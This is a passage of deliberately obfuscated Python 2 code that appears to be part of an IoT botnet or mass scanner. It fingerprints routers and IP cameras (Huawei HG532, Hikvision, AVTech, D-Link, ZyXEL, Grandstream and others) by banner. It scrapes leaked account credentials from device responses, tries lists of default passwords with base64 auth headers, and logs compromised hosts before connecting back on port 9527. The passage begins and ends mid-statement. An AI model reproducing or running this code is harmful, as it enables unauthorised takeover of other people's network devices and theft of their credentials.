Oo00oO0O . group ( 2 ) ) time . sleep ( 1 ) if 85 - 85: Oo0Oo - Oo0 * I11I1Ii . IIiII if 62 - 62: oOoO0Ooo / O0oo0OOOOO00 * OOooOO0 - o0ooO - OOOoOooO if 27 - 27: Oo0Oo * Ii11i1iIi i11IiiI1I = [ ] o0o0000OO = { } O0000o0 = { } O0Oooo0ooo0 = { } IIi1i1iiii1Ii = { } Ooo000Oo = { } IIiiI = { } if 27 - 27: Oo0 % I11I1Ii * o0ooO - Ii11i1iIi O000oo0 = [ ] O0oOoo = { } o0O00OO = { } OO0 = { } o0Oo00O0O0 = { } ooOoO0o = { } I1I1IIi1i1I = { } IiIi11iii = { } IIi1i = { } IIIiI = { } IiiI1II1111I1 = { } ooOo = { } iIiIi1II11 = { } Ii1ii = { } iIi1I1IiIiiIi = { } O0oOO = { } if 15 - 15: Ii % oOoO0Ooo + oOOo0000o - O0oo if 69 - 69: Oo0Oo + i1IIi1i1iiI . IIiII + o0oooooO def oOo0OOO0000 ( targetip , targetport , bannerhint , loginhint = '' , passwordhint = '' ) : global o0O0oO global OO00oo0o if 31 - 31: Oo0Oo * I11I1Ii % oOOoO00oo0 + IIiIii1iI * IIiII if not OO00oo0o : return if 52 - 52: Oo0Oo O0000oO0O = ( targetip , int ( targetport ) ) I11i1I = hash ( O0000oO0O ) if I11i1I in O000oo0 : if 66 - 66: Ii * o0oooooO + Ii11i1iIi - OOOoOooO * IIiIii1iI return ; if 40 - 40: o0ooO / i1 * i1 * Ii11i1iIi if 28 - 28: O0oo0OOOOO00 - Oo0Oo * OOooOO0 if 83 - 83: oOoO0Ooo * IIiII / IIiII + i1 iii = '' ooOOO0oo0Oo00 = [ ] for I1I1iIIi11I in o0O0oO : if re . search ( I1I1iIIi11I [ 1 ] , bannerhint ) : if 82 - 82: Oooo % Oo0 iii = I1I1iIIi11I [ 0 ] ; ooOOO0oo0Oo00 = I1I1iIIi11I [ 2 : ] if 92 - 92: IIiII - Ii11i1iIi . oOOoO00oo0 . oOOo0000o break if 88 - 88: o0ooO * o0oooooO / Oooo if not iii : if 99 - 99: oOOoO00oo0 * i1 / IIiII * Ii / IIiIii1iI return if 34 - 34: Oo0 + Ii11i1iIi / oOOoO00oo0 ooOoO0o [ I11i1I ] = 0 I1I1IIi1i1I [ I11i1I ] = ooOOO0oo0Oo00 o0Oo00O0O0 [ I11i1I ] = iii if 60 - 60: i1IIi1i1iiI / oOOoO00oo0 % Oo0 O0oOoo [ I11i1I ] = ( targetip , int ( targetport ) , bannerhint ) o0O00OO [ I11i1I ] = 0 OO0 [ I11i1I ] = None IiIi11iii [ I11i1I ] = loginhint IIi1i [ I11i1I ] = passwordhint IIIiI [ I11i1I ] = "" IiiI1II1111I1 [ I11i1I ] = "" ooOo [ I11i1I ] = "" iIiIi1II11 [ I11i1I ] = "" Ii1ii [ I11i1I ] = "" O0oOO [ I11i1I ] = 0 O000oo0 . append ( I11i1I ) if 41 - 41: i1 . oOoO0Ooo - IIiIii1iI . i1 / I11I1Ii / IIiII def oOoo0 ( targetip , targetport , request , jobhash ) : O0000oO0O = ( targetip , int ( targetport ) ) if 81 - 81: oOOo0000o + OOooOO0 / OOooOO0 * Ii11i1iIi / IIiIIiIii1I - oOoO0Ooo O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) O0OOo00o00o . setblocking ( 0 ) if 46 - 46: Oo0Oo + Ii - i1 % IIiIIiIii1I try : O0OOo00o00o . connect ( O0000oO0O ) except : pass if 16 - 16: IIiIIiIii1I % O0oo0OOOOO00 I11i1I = hash ( O0OOo00o00o ) i11IiiI1I . append ( O0OOo00o00o ) o0o0000OO [ I11i1I ] = ( targetip , int ( targetport ) , request ) IIi1i1iiii1Ii [ I11i1I ] = 0 Ooo000Oo [ I11i1I ] = request O0Oooo0ooo0 [ I11i1I ] = '' IIiiI [ I11i1I ] = time . time ( ) O0000o0 [ I11i1I ] = jobhash OO0 [ jobhash ] = O0OOo00o00o iIi1I1IiIiiIi [ jobhash ] = '' return O0OOo00o00o if 77 - 77: Ii - IIiII def oo0O0o0Oo ( webhash ) : global i11iiiIi if 17 - 17: O0oo0OOOOO00 . IIiIIiIii1I + OOooOO0 % Oo0 * IIiII - Oo0Oo if 53 - 53: oOOo0000o / I11I1Ii + IIiIIiIii1I if 67 - 67: Ii if webhash in o0Oo00O0O0 and o0Oo00O0O0 [ webhash ] == 'hnap' and IIi1i [ webhash ] == '' : pass else : if 64 - 64: i1IIi1i1iiI if webhash in o0Oo00O0O0 and o0Oo00O0O0 [ webhash ] != '' and i11iiiIi : if IIIiI [ webhash ] : if 30 - 30: O0oo0OOOOO00 * oOOoO00oo0 * I11I1Ii + Oo0Oo / Oo0Oo if 88 - 88: i1IIi1i1iiI % O0oo - Oo0Oo * Oo0 iIi1I1IiIiiIi [ webhash ] = IIIiI [ webhash ] + ':' + iIi1I1IiIiiIi [ webhash ] if 24 - 24: IIiII Ii111i11iIi ( "%s:%d WP:%s:%s/%s:%s" % ( O0oOoo [ webhash ] [ 0 ] , O0oOoo [ webhash ] [ 1 ] , o0Oo00O0O0 [ webhash ] , IiIi11iii [ webhash ] , IIi1i [ webhash ] , iIi1I1IiIiiIi [ webhash ] ) ) if 78 - 78: I11I1Ii . Oooo . IIiIii1iI if 60 - 60: oOoO0Ooo % Oo0 + oOOo0000o / oOOo0000o if webhash in o0Oo00O0O0 and o0Oo00O0O0 [ webhash ] == 'xionghash' and IIi1i [ webhash ] != '' : IIi1IIii11I1I ( O0oOoo [ webhash ] [ 0 ] , int ( O0oOoo [ webhash ] [ 1 ] ) ) if 23 - 23: OOooOO0 % i1 % OOOoOooO OoO00Ooo0OoOo0O0Oo ( O0oOoo [ webhash ] [ 0 ] , 9527 , 'PORT:9527:' ) if 93 - 93: Oooo % oOoO0Ooo + Oo0 * O0oo * i1 if 79 - 79: i1 + I11I1Ii / oOOoO00oo0 ooOoO0o [ webhash ] = None I1I1IIi1i1I [ webhash ] = None O0oOoo [ webhash ] = None o0O00OO [ webhash ] = None OO0 [ webhash ] = None o0Oo00O0O0 [ webhash ] = None IiIi11iii [ webhash ] = None IIi1i [ webhash ] = None IIIiI [ webhash ] = None IiiI1II1111I1 [ webhash ] = None ooOo [ webhash ] = None iIiIi1II11 [ webhash ] = None Ii1ii [ webhash ] = None O0oOO [ webhash ] = None O000oo0 . remove ( webhash ) if 31 - 31: O0oo0OOOOO00 - oOOo0000o * oOOoO00oo0 - OOooOO0 - o0ooO def oooo0o0 ( f ) : i1i1iII1I = bytearray ( ) O0OooO0Oo0O = 0 while O0OooO0Oo0O < len ( f ) : oOOO00O0 = f [ O0OooO0Oo0O ] if oOOO00O0 is None or oOOO00O0 == '\0' : return str ( i1i1iII1I ) else : i1i1iII1I . append ( oOOO00O0 ) O0OooO0Oo0O += 1 if 72 - 72: oOoO0Ooo def ii1I1I1i ( boundary , vals ) : O0o0oo0000 = '' for ooOO00oOo in vals : O0o0oo0000 += boundary + '\r\n' O0o0oo0000 += 'Content-Disposition: form-data; name="' + ooOO00oOo [ 0 ] + '"\r\n\r\n' + ooOO00oOo [ 1 ] + '\r\n' O0o0oo0000 += boundary + '--\r\n' return O0o0oo0000 if 81 - 81: Oo0Oo / Ii def iIiIii111Ii ( sock ) : global webclient_maxattempts global iI1iiii11I11I global IIIIiI if 74 - 74: Oo0Oo . OOOoOooO % o0ooO + IIiII * IIiIIiIii1I . oOOo0000o I11i1I = hash ( sock ) iiIii1I1i1 = O0000o0 [ I11i1I ] if 94 - 94: Oo0 + OOOoOooO - IIiIii1iI if not O0oOO [ iiIii1I1i1 ] : try : sock . close ( ) except : pass else : print "Debug: Skipping sock close due to keepalive" pass if 98 - 98: O0oo % Ii11i1iIi . Ii11i1iIi * Ii OOoOoooOo0 = 0 if 19 - 19: oOOoO00oo0 % I11I1Ii * OOooOO0 iIi1I1IiIiiIi [ iiIii1I1i1 ] = '' ; try : iIi1I1IiIiiIi [ iiIii1I1i1 ] = O0Oooo0ooo0 [ I11i1I ] . split ( '\n' ) [ 0 ] . strip ( ) except : pass if 28 - 28: i1 iii = o0Oo00O0O0 [ iiIii1I1i1 ] if 33 - 33: Oo0Oo / IIiIIiIii1I * I11I1Ii - i1IIi1i1iiI + O0oo0OOOOO00 if iii == 'kguard' : if ooOoO0o [ iiIii1I1i1 ] == 0 : if not 'MCTP/1.0 2' in O0Oooo0ooo0 [ I11i1I ] : ooOoO0o [ iiIii1I1i1 ] = 99 else : IiIi11iii [ iiIii1I1i1 ] = 'xesp' ooOoO0o [ iiIii1I1i1 ] += 1 if 25 - 25: IIiIIiIii1I % IIiIii1iI / OOooOO0 if iii == 'hnap' : if ooOoO0o [ iiIii1I1i1 ] == 0 : if not 'purenetworks' in O0Oooo0ooo0 [ I11i1I ] : ooOoO0o [ iiIii1I1i1 ] = 99 else : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 11 - 11: oOOoO00oo0 % OOOoOooO + OOOoOooO % OOooOO0 if iii == 'avtech' : if 44 - 44: i1 + oOOoO00oo0 - oOOoO00oo0 * OOOoOooO * Ii11i1iIi if ooOoO0o [ iiIii1I1i1 ] == 0 : if 84 - 84: O0oo0OOOOO00 * IIiIii1iI % i1IIi1i1iiI if 6 - 6: oOOoO00oo0 . OOooOO0 - i1 - Oo0 if 31 - 31: Oo0 % Oo0 / Ii if 22 - 22: OOooOO0 . Oooo if 87 - 87: OOOoOooO oOo0O0O = '' IIIIiiIIIiiII = '' for O00O0oOoo in O0Oooo0ooo0 [ I11i1I ] . split ( ) : i1IiiIIIi = O00O0oOoo . split ( '=' ) if ( len ( i1IiiIIIi ) == 2 ) : if ( i1IiiIIIi [ 0 ] == 'Account.User1.Username' ) : oOo0O0O = i1IiiIIIi [ 1 ] elif ( i1IiiIIIi [ 0 ] == 'Account.User1.Password' ) : IIIIiiIIIiiII = i1IiiIIIi [ 1 ] break if ( i1IiiIIIi [ 0 ] == 'Account.User2.Username' ) : oOo0O0O = i1IiiIIIi [ 1 ] elif ( i1IiiIIIi [ 0 ] == 'Account.User2.Password' ) : IIIIiiIIIiiII = i1IiiIIIi [ 1 ] break if ( i1IiiIIIi [ 0 ] == 'Account.User3.Username' ) : oOo0O0O = i1IiiIIIi [ 1 ] elif ( i1IiiIIIi [ 0 ] == 'Account.User3.Password' ) : IIIIiiIIIiiII = i1IiiIIIi [ 1 ] break if 77 - 77: Ii11i1iIi . oOOo0000o % IIiIIiIii1I . oOOo0000o * i1 if 86 - 86: oOOo0000o % I11I1Ii . oOOo0000o . O0oo if IIIIiiIIIiiII == '' : oOo0O0O = 'admin' IIIIiiIIIiiII = 'admin' IiIi11iii [ iiIii1I1i1 ] = oOo0O0O IIi1i [ iiIii1I1i1 ] = IIIIiiIIIiiII IiiI1II1111I1 [ iiIii1I1i1 ] = binascii . b2a_base64 ( '%s:%s' % ( oOo0O0O , IIIIiiIIIiiII ) ) . strip ( ) ooOoO0o [ iiIii1I1i1 ] += 1 if iii == 'wificam' : if 49 - 49: Oooo + i1IIi1i1iiI % IIiII if ooOoO0o [ iiIii1I1i1 ] == 0 : if 49 - 49: Oo0 + oOOoO00oo0 . OOooOO0 - Oo0Oo . o0oooooO try : O000OOo0oOOOo = O0Oooo0ooo0 [ I11i1I ] . find ( '\x0a\x0a\x0a\x0a\x01' ) oOo0O0O = '' IIIIiiIIIiiII = '' if O000OOo0oOOOo >= 0 : O000OOo0oOOOo += ( 138 + 4 ) if 58 - 58: O0oo + OOOoOooO . o0oooooO * IIiIii1iI * O0oo0OOOOO00 * Ii oOo0O0O = oooo0o0 ( O0Oooo0ooo0 [ I11i1I ] [ O000OOo0oOOOo : O000OOo0oOOOo + 31 ] ) IIIIiiIIIiiII = oooo0o0 ( O0Oooo0ooo0 [ I11i1I ] [ O000OOo0oOOOo + 32 : O000OOo0oOOOo + 63 ] ) if 85 - 85: IIiII + O0oo * OOOoOooO ooOoO0o [ iiIii1I1i1 ] += 1 IiIi11iii [ iiIii1I1i1 ] = oOo0O0O IIi1i [ iiIii1I1i1 ] = IIIIiiIIIiiII except : pass ooOoO0o [ iiIii1I1i1 ] += 1 elif ooOoO0o [ iiIii1I1i1 ] == 1 : if 93 - 93: Ii - IIiIii1iI * IIiII % i1IIi1i1iiI * OOOoOooO - I11I1Ii oOo0O0O = '' IIIIiiIIIiiII = '' Oo00oO0O = re . search ( 'loginuser="([^"]+)";' , O0Oooo0ooo0 [ I11i1I ] ) ; if Oo00oO0O : oOo0O0O = Oo00oO0O . group ( 1 ) Oo00oO0O = re . search ( 'loginpass="([^"]+)";' , O0Oooo0ooo0 [ I11i1I ] ) ; if Oo00oO0O : IIIIiiIIIiiII = Oo00oO0O . group ( 1 ) if 30 - 30: o0oooooO / IIiIIiIii1I + o0oooooO + IIiII + i1 + oOoO0Ooo if 28 - 28: oOOo0000o + O0oo0OOOOO00 - oOOoO00oo0 if IIIIiiIIIiiII == '' and oOo0O0O == '' and IiIi11iii [ iiIii1I1i1 ] == '' : if 46 - 46: o0oooooO oOo0O0O = "admin" IIIIiiIIIiiII = "admin" if 75 - 75: o0ooO + IIiII + oOoO0Ooo + IIiIii1iI if IiIi11iii [ iiIii1I1i1 ] == '' : IiIi11iii [ iiIii1I1i1 ] = oOo0O0O if IIi1i [ iiIii1I1i1 ] == '' : IIi1i [ iiIii1I1i1 ] = IIIIiiIIIiiII ooOoO0o [ iiIii1I1i1 ] += 1 elif ooOoO0o [ iiIii1I1i1 ] >= 2 : ooOoO0o [ iiIii1I1i1 ] += 1 if 22 - 22: Oooo - OOooOO0 + O0oo0OOOOO00 + OOOoOooO % Oooo . Ii if iii == 'homestation' : if ooOoO0o [ iiIii1I1i1 ] <= 0 : if 70 - 70: Ii11i1iIi * O0oo IIIoOo = re . search ( 'sessionid\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] ) if IIIoOo : IiiI1II1111I1 [ iiIii1I1i1 ] = IIIoOo . group ( 1 ) IiIi11iii [ iiIii1I1i1 ] = 'TelefonicaUser' IIi1i [ iiIii1I1i1 ] = 'user' else : if ooOoO0o [ iiIii1I1i1 ] >= 0 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 84 - 84: IIiIii1iI if iii == 'observa' : if ooOoO0o [ iiIii1I1i1 ] <= 0 : if 55 - 55: I11I1Ii IIIoOo = re . search ( 'sessionid\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] ) I1I11 = re . search ( 'username\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] ) i1iii1I1 = re . search ( 'password\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] ) if IIIoOo and I1I11 and i1iii1I1 : IiiI1II1111I1 [ iiIii1I1i1 ] = IIIoOo . group ( 1 ) ooOo [ iiIii1I1i1 ] = '' . join ( random . choice ( '0123456789' ) for i in range ( 8 ) ) iIiIi1II11 [ iiIii1I1i1 ] = '' IiIi11iii [ iiIii1I1i1 ] = I1I11 . group ( 1 ) IIi1i [ iiIii1I1i1 ] = i1iii1I1 . group ( 1 ) else : if ooOoO0o [ iiIii1I1i1 ] >= 0 : ooOoO0o [ iiIii1I1i1 ] = 99 else : Oo00oO0O = re . search ( 'G_Conns\S+\s+=\s+\"(\S+)\"\;\s+\S*Username' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : Ii1ii [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) Oo00oO0O = re . search ( '\d+@(\S+)' , Ii1ii [ iiIii1I1i1 ] ) if Oo00oO0O : iIiIi1II11 [ iiIii1I1i1 ] = ooOo [ iiIii1I1i1 ] + '%40' + Oo00oO0O . group ( 1 ) else : iIiIi1II11 [ iiIii1I1i1 ] = Ii1ii [ iiIii1I1i1 ] ooOoO0o [ iiIii1I1i1 ] += 1 if 19 - 19: i1 % i1 % Oooo if iii == 'hg532' : if ooOoO0o [ iiIii1I1i1 ] <= 3 : if 'SessionID_R3=' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOo [ iiIii1I1i1 ] = 'OGM2OTc2ZTViNTQxMDQxNWJkZTkwOGJkNGRlZTE1ZGZiMTY3YTljODczZmM0YmI4YTgxZjZmMmFiNDQ4YTkxOA%3D%3D' iIiIi1II11 [ iiIii1I1i1 ] = '' ooOoO0o [ iiIii1I1i1 ] = 3 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'instalador' IIi1i [ iiIii1I1i1 ] = '.corporacion' ooOo [ iiIii1I1i1 ] = 'N2MwNGQxMzUzNzI1Y2ZkNzU4ZTFhYzNjM2JjZGRiMDkxNWNlNzA4OWU1NTlkODQ0Yjk2YTU4MjFmNTM1N2Y4Mg%3D%3D' iIiIi1II11 [ iiIii1I1i1 ] = 'CNT_ES_' ooOoO0o [ iiIii1I1i1 ] = 3 elif ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'instalador' IIi1i [ iiIii1I1i1 ] = 'cnt2016admin' ooOo [ iiIii1I1i1 ] = 'NjQzMGU0ZDBhMTMyYzI5Njg4NGUzMjNlOWJkMWM1MzJhODZmYmQ3OWJlYmUxN2U0Nzc1NDlmZjBkYjM0YzNiNA%3D%3D' iIiIi1II11 [ iiIii1I1i1 ] = 'CNT_ES_' ooOoO0o [ iiIii1I1i1 ] = 3 elif ooOoO0o [ iiIii1I1i1 ] == 3 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOo [ iiIii1I1i1 ] = 'YWRtaW4%3D' iIiIi1II11 [ iiIii1I1i1 ] = '' ooOoO0o [ iiIii1I1i1 ] = 3 else : if ooOoO0o [ iiIii1I1i1 ] == 2 : if 96 - 96: Oo0 / oOOoO00oo0 / Oooo o0O00OO [ iiIii1I1i1 ] = time . time ( ) + 65 ; if ooOoO0o [ iiIii1I1i1 ] >= 3 : ooOoO0o [ iiIii1I1i1 ] = 99 if 79 - 79: Oooo + IIiIIiIii1I % i1 Oo00oO0O = re . search ( 'SessionID_R3=([a-zA-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) ooOoO0o [ iiIii1I1i1 ] += 1 if 63 - 63: i1 % I11I1Ii / O0oo0OOOOO00 - IIiIIiIii1I / IIiIIiIii1I + IIiIIiIii1I if iii == 'hg532a' : if ooOoO0o [ iiIii1I1i1 ] <= 0 : if 'sessionID=' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOo [ iiIii1I1i1 ] = 'YWRtaW4=' iIiIi1II11 [ iiIii1I1i1 ] = '' ooOoO0o [ iiIii1I1i1 ] = 0 else : ooOoO0o [ iiIii1I1i1 ] = 99 if 95 - 95: OOOoOooO - I11I1Ii * O0oo % Oo0Oo - OOooOO0 * Oooo Oo00oO0O = re . search ( 'sessionID=([a-zA-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) ooOoO0o [ iiIii1I1i1 ] += 1 if 96 - 96: IIiIii1iI + I11I1Ii % I11I1Ii * i1 if iii == 'zxdsl831' : if ooOoO0o [ iiIii1I1i1 ] <= 1 : if 'vpivci.cgi' in O0Oooo0ooo0 [ I11i1I ] : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] = 1 else : if ooOoO0o [ iiIii1I1i1 ] >= 1 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 41 - 41: OOOoOooO if iii == 'engenius' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 20 - 20: O0oo0OOOOO00 / Oooo * o0ooO / Ii11i1iIi + o0ooO if iii == 'crossweb' : if 69 - 69: Oooo . Oooo / IIiII + O0oo0OOOOO00 % Oo0Oo - OOooOO0 IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 26 - 26: IIiIii1iI . I11I1Ii - i1 . Oooo if iii == 'hanbang' : if ooOoO0o [ iiIii1I1i1 ] > 0 and ooOoO0o [ iiIii1I1i1 ] <= 5 : if 25 - 25: Oo0 if 'Value>200= 5 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 50 - 50: Oo0Oo / oOoO0Ooo - oOOoO00oo0 + IIiIIiIii1I if iii == 'grandstream' : if ooOoO0o [ iiIii1I1i1 ] <= 4 : if 82 - 82: OOOoOooO * O0oo if '200 OK' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4=' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '12345' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU=' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '1234' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNA==' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 3 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '123456' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU2' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 4 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '888888' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46ODg4ODg4' ooOoO0o [ iiIii1I1i1 ] = 4 else : if ooOoO0o [ iiIii1I1i1 ] >= 4 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 14 - 14: IIiIii1iI + Oooo if iii == 'dir300600' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 67 - 67: IIiII if iii == 'dir850' : if ooOoO0o [ iiIii1I1i1 ] == 0 : if '' in O0Oooo0ooo0 [ I11i1I ] : IIIoOo = re . search ( 'name>([^<]+)(.*)' , O0Oooo0ooo0 [ I11i1I ] ) if IIIoOo and I1I11 : IiIi11iii [ iiIii1I1i1 ] = IIIoOo . group ( 1 ) IIi1i [ iiIii1I1i1 ] = I1I11 . group ( 1 ) if ooOoO0o [ iiIii1I1i1 ] == 1 : if 54 - 54: IIiIIiIii1I + O0oo0OOOOO00 * Oooo - O0oo0OOOOO00 . O0oo if 'status": "ok"' in O0Oooo0ooo0 [ I11i1I ] : IiIi11iii [ iiIii1I1i1 ] += 'OK' ooOoO0o [ iiIii1I1i1 ] += 1 if 59 - 59: IIiIIiIii1I if iii == 'hikweb' : if ooOoO0o [ iiIii1I1i1 ] <= 10 : if 33 - 33: OOooOO0 + i1 if 'Reboot Required' in O0Oooo0ooo0 [ I11i1I ] : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' if 99 - 99: i1IIi1i1iiI . IIiIii1iI + o0ooO elif 'Value>200= 10 : ooOoO0o [ iiIii1I1i1 ] = 99 if IiIi11iii [ iiIii1I1i1 ] == 'n' : if 94 - 94: i1IIi1i1iiI + IIiIii1iI - Oo0 - o0ooO o0O00OO [ iiIii1I1i1 ] = time . time ( ) + 60 ooOoO0o [ iiIii1I1i1 ] += 1 if 58 - 58: o0oooooO - OOooOO0 + Oo0 - Oo0Oo if iii == 'sify' : if ooOoO0o [ iiIii1I1i1 ] <= 0 : if 71 - 71: Oo0 % Oo0 IIIoOo = re . search ( 'Location: /cgi-bin/luci/;stok=([a-f0-9]+)' , O0Oooo0ooo0 [ I11i1I ] ) I1I11 = re . search ( 'Set-Cookie: sysauth=([a-f0-9]+);' , O0Oooo0ooo0 [ I11i1I ] ) if IIIoOo and I1I11 : IiiI1II1111I1 [ iiIii1I1i1 ] = IIIoOo . group ( 1 ) ooOo [ iiIii1I1i1 ] = I1I11 . group ( 1 ) if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOoO0o [ iiIii1I1i1 ] = 0 else : if ooOoO0o [ iiIii1I1i1 ] >= 0 : ooOoO0o [ iiIii1I1i1 ] = 99 else : pass ooOoO0o [ iiIii1I1i1 ] += 1 if 50 - 50: OOooOO0 + i1 . Oo0 if iii == 'zyxelp660' : if ooOoO0o [ iiIii1I1i1 ] <= 1 : if 89 - 89: IIiIii1iI / O0oo if 8 - 8: IIiIii1iI * oOoO0Ooo * Oo0 / IIiIii1iI * Oo0Oo + Ii11i1iIi if not '/rpAuth' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '1234' ooOoO0o [ iiIii1I1i1 ] = 1 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOoO0o [ iiIii1I1i1 ] = 1 else : if ooOoO0o [ iiIii1I1i1 ] >= 1 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 64 - 64: o0ooO / IIiII % Oooo - IIiIIiIii1I + OOooOO0 * Ii if iii == 'supernet' : if 30 - 30: i1 if ooOoO0o [ iiIii1I1i1 ] <= 0 : if '200 OK' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOoO0o [ iiIii1I1i1 ] = 0 else : if ooOoO0o [ iiIii1I1i1 ] >= 0 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 75 - 75: I11I1Ii / IIiII + Oo0Oo if iii == 'realtron' : if 11 - 11: Oooo - Oo0Oo % IIiII - i1 if ooOoO0o [ iiIii1I1i1 ] <= 3 : if '200 OK' in O0Oooo0ooo0 [ I11i1I ] and not 'Failed' in O0Oooo0ooo0 [ I11i1I ] and not 'enter a username and password when prompted' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4=' ooOoO0o [ iiIii1I1i1 ] = 3 if ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4=' ooOoO0o [ iiIii1I1i1 ] = 3 if ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '1234' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNA==' ooOoO0o [ iiIii1I1i1 ] = 3 if ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'password' IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46cGFzc3dvcmQ=' ooOoO0o [ iiIii1I1i1 ] = 3 else : if ooOoO0o [ iiIii1I1i1 ] >= 3 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 71 - 71: Oo0Oo % Ii11i1iIi . o0oooooO * Ii11i1iIi % OOooOO0 if iii == 'pldtmydsl' : if ooOoO0o [ iiIii1I1i1 ] <= 0 : if 51 - 51: oOOo0000o * i1IIi1i1iiI % Oooo * i1 - O0oo . oOoO0Ooo Oo00oO0O = re . search ( 'SESSION=(\d+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '1234' ooOoO0o [ iiIii1I1i1 ] = 0 else : if ooOoO0o [ iiIii1I1i1 ] >= 0 : ooOoO0o [ iiIii1I1i1 ] = 99 else : if 77 - 